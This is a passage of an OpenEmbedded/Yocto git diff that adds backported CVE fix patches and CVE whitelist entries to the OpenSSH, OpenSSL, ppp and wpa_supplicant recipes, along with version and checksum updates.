-Wants=sshdgenkeys.service
 After=sshdgenkeys.service
 
 [Service]
 Environment="SSHD_OPTS="
 EnvironmentFile=-/etc/default/ssh
 ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS
-ExecReload=@BASE_BINDIR@/kill -HUP $MAINPID
 StandardInput=socket
 StandardError=syslog
 KillMode=process
diff --git a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
index fe94f30503..9d6cf7da6c 100644
--- a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \
 and for executing commands on a remote machine."
 HOMEPAGE = "http://www.openssh.com/"
 SECTION = "console/network"
-LICENSE = "BSD & ISC & MIT"
+LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT"
 LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3"
 
 DEPENDS = "zlib openssl virtual/crypt"
@@ -24,14 +24,63 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
            file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
            file://sshd_check_keys \
            file://add-test-support-for-busybox.patch \
+           file://CVE-2020-14145.patch \
+           file://CVE-2021-28041.patch \
+           file://CVE-2021-41617.patch \
+           file://CVE-2023-38408-01.patch \
+           file://CVE-2023-38408-02.patch \
+           file://CVE-2023-38408-03.patch \
+           file://CVE-2023-38408-04.patch \
+           file://CVE-2023-38408-05.patch \
+           file://CVE-2023-38408-06.patch \
+           file://CVE-2023-38408-07.patch \
+           file://CVE-2023-38408-08.patch \
+           file://CVE-2023-38408-09.patch \
+           file://CVE-2023-38408-10.patch \
+           file://CVE-2023-38408-11.patch \
+           file://CVE-2023-38408-12.patch \
+           file://CVE-2023-48795.patch \
+           file://CVE-2023-51385.patch \
            "
 SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091"
 SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671"
 
+# This CVE is specific to OpenSSH with the pam opie which we don't build/use here
+CVE_CHECK_WHITELIST += "CVE-2007-2768"
+
 # This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7
 # and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded
 CVE_CHECK_WHITELIST += "CVE-2014-9278"
 
+# As per upstream, because of the way scp is based on a historical protocol called rcp
+# which relies on that style of argument passing and therefore encounters expansion
+# problems. Making changes to how the scp command line works breaks the pattern used
+# by scp consumers. Upstream therefore recommends the use of rsync in the place of
+# scp for better security. https://bugzilla.redhat.com/show_bug.cgi?id=1860487
+CVE_CHECK_WHITELIST += "CVE-2020-15778"
+
+# CVE-2008-3844 was reported in OpenSSH on Red Hat Enterprise Linux and
+# certain packages may have been compromised. This CVE is not applicable
+# as our source is OpenBSD. https://securitytracker.com/id?1020730
+# https://www.securityfocus.com/bid/30794
+CVE_CHECK_WHITELIST += "CVE-2008-3844"
+
+# openssh-ssh1 is provided for compatibility with old devices that
+# cannot be upgraded to modern protocols. Thus they may not provide security
+# support for this package because doing so would prevent access to equipment.
+# The upstream OpenSSH developers see this as an important
+# security feature and do not intend to 'fix' it.
+# https://security-tracker.debian.org/tracker/CVE-2016-20012
+# https://ubuntu.com/security/CVE-2016-20012
+CVE_CHECK_WHITELIST += "CVE-2016-20012"
+
+# As per debian, the issue is fixed by a feature called "agent restriction" in openssh 8.9
+# Urgency is unimportant as per debian, Hence this CVE is whitelisting.
+# https://security-tracker.debian.org/tracker/CVE-2021-36368
+# https://bugzilla.mindrot.org/show_bug.cgi?id=3316#c2
+# https://docs.ssh-mitm.at/trivialauth.html
+CVE_CHECK_WHITELIST += "CVE-2021-36368"
+
 PAM_SRC_URI = "file://sshd"
 
 inherit manpages useradd update-rc.d update-alternatives systemd
@@ -155,12 +204,17 @@ FILES_${PN}-sftp-server = "${libexecdir}/sftp-server"
 FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*"
 FILES_${PN}-keygen = "${bindir}/ssh-keygen"
 
-RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen"
+RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen ${PN}-sftp-server"
 RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}"
 RRECOMMENDS_${PN}-sshd_append_class-target = "\
     ${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \
 "
 
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
 # gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies
 RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils"
 
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
new file mode 100644
index 0000000000..e2a65d0998
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
@@ -0,0 +1,38 @@
+From 679ae2f72ef8cf37609cb0eff5de3b98aa85e395 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Thu, 20 Jul 2023 04:14:42 -1000
+Subject: [PATCH] Configure: add 2 missing key sorts in generation of unified_info
+
+Otherwise generation of this section in configdata.pm is not reproducible
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Backport [adapted from 3.x commit https://github.com/openssl/openssl/commit/764cf5b26306a8712e8b3d41599c44dc5ed07a25]
+---
+ Configure | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Configure b/Configure
+index 2a01746..8fc5a2c 100755
+--- a/Configure
++++ b/Configure
+@@ -2326,7 +2326,7 @@ EOF
+                      "dso" => [ @{$unified_info{engines}} ],
+                      "bin" => [ @{$unified_info{programs}} ],
+                      "script" => [ @{$unified_info{scripts}} ] );
+-    foreach my $type (keys %loopinfo) {
++    foreach my $type (sort keys %loopinfo) {
+         foreach my $product (@{$loopinfo{$type}}) {
+             my %dirs = ();
+             my $pd = dirname($product);
+@@ -2347,7 +2347,7 @@ EOF
+                 push @{$unified_info{dirinfo}->{$d}->{deps}}, $_
+                     if $d ne $pd;
+             }
+-            foreach (keys %dirs) {
++            foreach (sort keys %dirs) {
+                 push @{$unified_info{dirinfo}->{$_}->{products}->{$type}},
+                     $product;
+             }
+-- 
+2.34.1
+
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
new file mode 100644
index 0000000000..b3f6a942d5
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
@@ -0,0 +1,37 @@
+From 326909baf81a638d51fa8be1d8227518784f5cc4 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Tue, 14 Sep 2021 12:18:25 +0200
+Subject: [PATCH] Configure: do not tweak mips cflags
+
+This conflicts with mips machine definitons from yocto,
+e.g.
+| Error: -mips3 conflicts with the other architecture options, which imply -mips64r2
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ Configure | 10 ----------
+ 1 file changed, 10 deletions(-)
+
+Index: openssl-3.0.4/Configure
+===================================================================
+--- openssl-3.0.4.orig/Configure
++++ openssl-3.0.4/Configure
+@@ -1243,16 +1243,6 @@ if ($target =~ /^mingw/ && `$config{CC} --target-help 2>&1` =~ m/-mno-cygwin/m)
+         push @{$config{shared_ldflag}}, "-mno-cygwin";
+         }
+ 
+-if ($target =~ /linux.*-mips/ && !$disabled{asm}
+-        && !grep { $_ =~ /-m(ips|arch=)/ } (@{$config{CFLAGS}})) {
+-        # minimally required architecture flags for assembly modules
+-        my $value;
+-        $value = '-mips2' if ($target =~ /mips32/);
+-        $value = '-mips3' if ($target =~ /mips64/);
+-        unshift @{$config{cflags}}, $value;
+-        unshift @{$config{cxxflags}}, $value if $config{CXX};
+-}
+-
+ # If threads aren't disabled, check how possible they are
+ unless ($disabled{threads}) {
+     if ($auto_threads) {
diff --git a/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
new file mode 100644
index 0000000000..3da6879ccb
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 09df4395b5071217b76dc7d3d2e630eb8c5a79c2 Mon Sep 17 00:00:00 2001
+From: Matt Caswell <matt@openssl.org>
+Date: Fri, 19 Jan 2024 11:28:58 +0000
+Subject: [PATCH] Add NULL checks where ContentInfo data can be NULL
+
+PKCS12 structures contain PKCS7 ContentInfo fields. These fields are
+optional and can be NULL even if the "type" is a valid value. OpenSSL
+was not properly accounting for this and a NULL dereference can occur
+causing a crash.
+
+CVE-2024-0727
+
+Reviewed-by: Tomas Mraz <tomas@openssl.org>
+Reviewed-by: Hugo Landau <hlandau@openssl.org>
+Reviewed-by: Neil Horman <nhorman@openssl.org>
+(Merged from https://github.com/openssl/openssl/pull/23362)
+
+(cherry picked from commit d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c)
+
+Upstream-Status: Backport [https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c]
+
+CVE: CVE-2024-0727
+
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ crypto/pkcs12/p12_add.c  | 18 ++++++++++++++++++
+ crypto/pkcs12/p12_mutl.c |  5 +++++
+ crypto/pkcs12/p12_npas.c |  5 +++--
+ crypto/pkcs7/pk7_mime.c  |  7 +++++--
+ 4 files changed, 31 insertions(+), 4 deletions(-)
+
+--- a/crypto/pkcs12/p12_add.c
++++ b/crypto/pkcs12/p12_add.c
+@@ -76,6 +76,13 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+                   PKCS12_R_CONTENT_TYPE_NOT_DATA);
+         return NULL;
+     }
++
++    if (p7->d.data == NULL) {
++        PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
++                  PKCS12_R_DECODE_ERROR);
++        return NULL;
++    }
++
+     return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
+ }
+ 
+@@ -132,6 +139,12 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ {
+     if (!PKCS7_type_is_encrypted(p7))
+         return NULL;
++
++    if (p7->d.encrypted == NULL) {
++        PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA, PKCS12_R_DECODE_ERROR);
++        return NULL;
++    }
++
+     return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
+                                    ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
+                                    pass, passlen,
+@@ -159,6 +172,13 @@ STACK_OF(PKCS7) *PKCS12_unpack_authsafes
+                   PKCS12_R_CONTENT_TYPE_NOT_DATA);
+         return NULL;
+     }
++
++    if (p12->authsafes->d.data == NULL) {
++        PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
++                  PKCS12_R_DECODE_ERROR);
++        return NULL;
++    }
++
+     return ASN1_item_unpack(p12->authsafes->d.data,
+                             ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
+ }
+--- a/crypto/pkcs12/p12_mutl.c
++++ b/crypto/pkcs12/p12_mutl.c
+@@ -93,6 +93,11 @@ static int pkcs12_gen_mac(PKCS12 *p12, c
+         return 0;
+     }
+ 
++    if (p12->authsafes->d.data == NULL) {
++        PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_DECODE_ERROR);
++        return 0;
++    }
++
+     salt = p12->mac->salt->data;
+     saltlen = p12->mac->salt->length;
+     if (!p12->mac->iter)
+--- a/crypto/pkcs12/p12_npas.c
++++ b/crypto/pkcs12/p12_npas.c
+@@ -78,8 +78,9 @@ static int newpass_p12(PKCS12 *p12, cons
+             bags = PKCS12_unpack_p7data(p7);
+         } else if (bagnid == NID_pkcs7_encrypted) {
+             bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
+-            if (!alg_get(p7->d.encrypted->enc_data->algorithm,
+-                         &pbe_nid, &pbe_iter, &pbe_saltlen))
++            if (p7->d.encrypted == NULL
++                    || !alg_get(p7->d.encrypted->enc_data->algorithm,
++                                &pbe_nid, &pbe_iter, &pbe_saltlen))
+                 goto err;
+         } else {
+             continue;
+--- a/crypto/pkcs7/pk7_mime.c
++++ b/crypto/pkcs7/pk7_mime.c
+@@ -30,10 +30,13 @@ int SMIME_write_PKCS7(BIO *bio, PKCS7 *p
+ {
+     STACK_OF(X509_ALGOR) *mdalgs;
+     int ctype_nid = OBJ_obj2nid(p7->type);
+-    if (ctype_nid == NID_pkcs7_signed)
++    if (ctype_nid == NID_pkcs7_signed) {
++        if (p7->d.sign == NULL)
++            return 0;
+         mdalgs = p7->d.sign->md_algs;
+-    else
++    } else {
+         mdalgs = NULL;
++    }
+ 
+     flags ^= SMIME_OLDMIME;
+ 
diff --git a/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
new file mode 100644
index 0000000000..8accbc9df2
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
@@ -0,0 +1,22 @@
+Using localtime() means the output can depend on the timezone of the build machine.
+Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Upstream-Status: Pending [should be suitable]
+
+Index: openssl-3.0.1/apps/progs.pl
+===================================================================
+--- openssl-3.0.1.orig/apps/progs.pl
++++ openssl-3.0.1/apps/progs.pl
+@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or
+ my %commands     = ();
+ my $cmdre        = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/;
+ my $apps_openssl = shift @ARGV;
+-my $YEAR         = [localtime()]->[5] + 1900;
++my $YEAR         = [gmtime()]->[5] + 1900;
++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) {
++    $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900;
++}
+ 
+ # because the program apps/openssl has object files as sources, and
+ # they then have the corresponding C files as source, we need to chain
diff --git a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
index 815955837b..0e490eabc3 100644
--- a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
@@ -17,13 +17,17 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
            file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
            file://afalg.patch \
            file://reproducible.patch \
+           file://reproducibility.patch \
+           file://0001-Configure-add-2-missing-key-sorts.patch \
+           file://0001-Configure-do-not-tweak-mips-cflags.patch \
+           file://CVE-2024-0727.patch \
            "
 
 SRC_URI_append_class-nativesdk = " \
            file://environment.d-openssl.sh \
            "
 
-SRC_URI[sha256sum] = "ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46"
+SRC_URI[sha256sum] = "cf3098950cb4d853ad95c0841f1f9c6d3dc102dccfcacd521d93925208b76ac8"
 
 inherit lib_package multilib_header multilib_script ptest
 MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
@@ -179,6 +183,7 @@ do_install_ptest () {
 	install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps
 
 	install -d ${D}${PTEST_PATH}/engines
+	install -m755 ${B}/engines/dasync.so ${D}${PTEST_PATH}/engines
 	install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines
 }
 
@@ -210,6 +215,8 @@ BBCLASSEXTEND = "native nativesdk"
 
 CVE_PRODUCT = "openssl:openssl"
 
+CVE_VERSION_SUFFIX = "alphabetical"
+
 # Only affects OpenSSL >= 1.1.1 in combination with Apache < 2.4.37
 # Apache in meta-webserver is already recent enough
 CVE_CHECK_WHITELIST += "CVE-2019-0190"
diff --git a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
index b5f68951d7..b0097aa480 100644
--- a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
+++ b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Enables PPP dial-in through a serial connection"
 SECTION = "console/network"
+DESCRIPTION = "PPP dail-in provides a point to point protocol (PPP), so that other computers can dial up to it and access connected networks."
 DEPENDS = "ppp"
 RDEPENDS_${PN} = "ppp"
 PR = "r8"
diff --git a/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
new file mode 100644
index 0000000000..27b8863a4e
--- /dev/null
+++ b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
@@ -0,0 +1,50 @@
+From 2aeb41a9a3a43b11b1e46628d0bf98197ff9f141 Mon Sep 17 00:00:00 2001
+From: Paul Mackerras <paulus@ozlabs.org>
+Date: Thu, 29 Dec 2022 18:00:20 +0100
+Subject: [PATCH] pppdump: Avoid out-of-range access to packet buffer
+
+This fixes a potential vulnerability where data is written to spkt.buf
+and rpkt.buf without a check on the array index.  To fix this, we
+check the array index (pkt->cnt) before storing the byte or
+incrementing the count.  This also means we no longer have a potential
+signed integer overflow on the increment of pkt->cnt.
+
+Fortunately, pppdump is not used in the normal process of setting up a
+PPP connection, is not installed setuid-root, and is not invoked
+automatically in any scenario that I am aware of.
+
+Ustream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]
+CVE: CVE-2022-4603
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ pppdump/pppdump.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/pppdump/pppdump.c b/pppdump/pppdump.c
+index 87c2e8f..dec4def 100644
+--- a/pppdump/pppdump.c
++++ b/pppdump/pppdump.c
+@@ -296,6 +296,10 @@ dumpppp(f)
+ 			    printf("%s aborted packet:\n     ", dir);
+ 			    q = "    ";
+ 			}
++			if (pkt->cnt >= sizeof(pkt->buf)) {
++			    printf("%s over-long packet truncated:\n     ", dir);
++			    q = "    ";
++			}
+ 			nb = pkt->cnt;
+ 			p = pkt->buf;
+ 			pkt->cnt = 0;
+@@ -399,7 +403,8 @@ dumpppp(f)
+ 			c ^= 0x20;
+ 			pkt->esc = 0;
+ 		    }
+-		    pkt->buf[pkt->cnt++] = c;
++		    if (pkt->cnt < sizeof(pkt->buf))
++			    pkt->buf[pkt->cnt++] = c;
+ 		    break;
+ 		}
+ 	    }
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
index 60c56dd0bd..51ec25e660 100644
--- a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
+++ b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
@@ -34,6 +34,7 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/${BP}.tar.gz \
            file://0001-ppp-Remove-unneeded-include.patch \
            file://ppp-2.4.7-DES-openssl.patch \
            file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \
+           file://CVE-2022-4603.patch \
 "
 
 SRC_URI_append_libc-musl = "\
@@ -42,6 +43,10 @@ SRC_URI_append_libc-musl = "\
 SRC_URI[md5sum] = "78818f40e6d33a1d1de68a1551f6595a"
 SRC_URI[sha256sum] = "02e0a3dd3e4799e33103f70ec7df75348c8540966ee7c948e4ed8a42bbccfb30"
 
+# This CVE is specific to a patch applied by Ubuntu that is not used by
+# OpenEmbedded.
+CVE_CHECK_WHITELIST += "CVE-2020-15704"
+
 inherit autotools-brokensep systemd
 
 TARGET_CC_ARCH += " ${LDFLAGS}"
diff --git a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
index 67959576e8..5f0a5eac70 100644
--- a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
+++ b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
@@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood"
 HOMEPAGE = "http://packages.debian.org/resolvconf"
 RDEPENDS_${PN} = "bash"
 
-SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=unstable \
            file://fix-path-for-busybox.patch \
            file://99_resolvconf \
           "
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
new file mode 100644
index 0000000000..8c90fa3421
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
@@ -0,0 +1,45 @@
+From 947272febe24a8f0ea828b5b2f35f13c3821901e Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Mon, 9 Nov 2020 11:43:12 +0200
+Subject: [PATCH] P2P: Fix copying of secondary device types for P2P group
+ client
+
+Parsing and copying of WPS secondary device types list was verifying
+that the contents is not too long for the internal maximum in the case
+of WPS messages, but similar validation was missing from the case of P2P
+group information which encodes this information in a different
+attribute. This could result in writing beyond the memory area assigned
+for these entries and corrupting memory within an instance of struct
+p2p_device. This could result in invalid operations and unexpected
+behavior when trying to free pointers from that corrupted memory.
+
+Upstream-Status: Backport
+CVE: CVE-2021-0326
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=947272febe24a8f0ea828b5b2f35f13c3821901e]
+
+Credit to OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27269
+Fixes: e57ae6e19edf ("P2P: Keep track of secondary device types for peers")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/p2p/p2p.c b/src/p2p/p2p.c
+index a08ba02..079270f 100644
+--- a/src/p2p/p2p.c
++++ b/src/p2p/p2p.c
+@@ -453,6 +453,8 @@ static void p2p_copy_client_info(struct p2p_device *dev,
+ 	dev->info.config_methods = cli->config_methods;
+ 	os_memcpy(dev->info.pri_dev_type, cli->pri_dev_type, 8);
+ 	dev->info.wps_sec_dev_type_list_len = 8 * cli->num_sec_dev_types;
++	if (dev->info.wps_sec_dev_type_list_len > WPS_SEC_DEV_TYPE_MAX_LEN)
++		dev->info.wps_sec_dev_type_list_len = WPS_SEC_DEV_TYPE_MAX_LEN;
+ 	os_memcpy(dev->info.wps_sec_dev_type_list, cli->sec_dev_types,
+ 		  dev->info.wps_sec_dev_type_list_len);
+ }
+-- 
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
new file mode 100644
index 0000000000..004b1dbd19
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
@@ -0,0 +1,58 @@
+From 8460e3230988ef2ec13ce6b69b687e941f6cdb32 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 8 Dec 2020 23:52:50 +0200
+Subject: [PATCH] P2P: Fix a corner case in peer addition based on PD Request
+
+p2p_add_device() may remove the oldest entry if there is no room in the
+peer table for a new peer. This would result in any pointer to that
+removed entry becoming stale. A corner case with an invalid PD Request
+frame could result in such a case ending up using (read+write) freed
+memory. This could only by triggered when the peer table has reached its
+maximum size and the PD Request frame is received from the P2P Device
+Address of the oldest remaining entry and the frame has incorrect P2P
+Device Address in the payload.
+
+Fix this by fetching the dev pointer again after having called
+p2p_add_device() so that the stale pointer cannot be used.
+
+Fixes: 17bef1e97a50 ("P2P: Add peer entry based on Provision Discovery Request")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-27803
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=8460e3230988ef2ec13ce6b69b687e941f6cdb32]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p_pd.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/src/p2p/p2p_pd.c b/src/p2p/p2p_pd.c
+index 3994ec0..05fd593 100644
+--- a/src/p2p/p2p_pd.c
++++ b/src/p2p/p2p_pd.c
+@@ -595,14 +595,12 @@ void p2p_process_prov_disc_req(struct p2p_data *p2p, const u8 *sa,
+ 			goto out;
+ 		}
+ 
++		dev = p2p_get_device(p2p, sa);
+ 		if (!dev) {
+-			dev = p2p_get_device(p2p, sa);
+-			if (!dev) {
+-				p2p_dbg(p2p,
+-					"Provision Discovery device not found "
+-					MACSTR, MAC2STR(sa));
+-				goto out;
+-			}
++			p2p_dbg(p2p,
++				"Provision Discovery device not found "
++				MACSTR, MAC2STR(sa));
++			goto out;
+ 		}
+ 	} else if (msg.wfd_subelems) {
+ 		wpabuf_free(dev->info.wfd_subelems);
+-- 
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
new file mode 100644
index 0000000000..e2540fc26b
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
@@ -0,0 +1,123 @@
+From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Sat, 13 Mar 2021 18:19:31 +0200
+Subject: [PATCH] ASN.1: Validate DigestAlgorithmIdentifier parameters
+
+The supported hash algorithms do not use AlgorithmIdentifier parameters.
+However, there are implementations that include NULL parameters in
+addition to ones that omit the parameters. Previous implementation did
+not check the parameters value at all which supported both these cases,
+but did not reject any other unexpected information.
+
+Use strict validation of digest algorithm parameters and reject any
+unexpected value when validating a signature. This is needed to prevent
+potential forging attacks.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+
+Upstream-Status: Backport
+CVE: CVE-2021-30004
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=a0541334a6394f8237a4393b7372693cd7e96f15]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/tls/pkcs1.c  | 21 +++++++++++++++++++++
+ src/tls/x509v3.c | 20 ++++++++++++++++++++
+ 2 files changed, 41 insertions(+)
+
+diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
+index 141ac50..e09db07 100644
+--- a/src/tls/pkcs1.c
++++ b/src/tls/pkcs1.c
+@@ -240,6 +240,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ 		os_free(decrypted);
+ 		return -1;
+ 	}
++	wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
++		    hdr.payload, hdr.length);
+ 
+ 	pos = hdr.payload;
+ 	end = pos + hdr.length;
+@@ -261,6 +263,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ 		os_free(decrypted);
+ 		return -1;
+ 	}
++	wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
++		    hdr.payload, hdr.length);
+ 	da_end = hdr.payload + hdr.length;
+ 
+ 	if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -269,6 +273,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ 		os_free(decrypted);
+ 		return -1;
+ 	}
++	wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
++		    next, da_end - next);
++
++	/*
++	 * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++	 * omit the parameters, but there are implementation that encode these
++	 * as a NULL element. Allow these two cases and reject anything else.
++	 */
++	if (da_end > next &&
++	    (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++	     !asn1_is_null(&hdr) ||
++	     hdr.payload + hdr.length != da_end)) {
++		wpa_printf(MSG_DEBUG,
++			   "PKCS #1: Unexpected digest algorithm parameters");
++		os_free(decrypted);
++		return -1;
++	}
+ 
+ 	if (!asn1_oid_equal(&oid, hash_alg)) {
+ 		char txt[100], txt2[100];
+diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
+index 1bd5aa0..bf2289f 100644
+--- a/src/tls/x509v3.c
++++ b/src/tls/x509v3.c
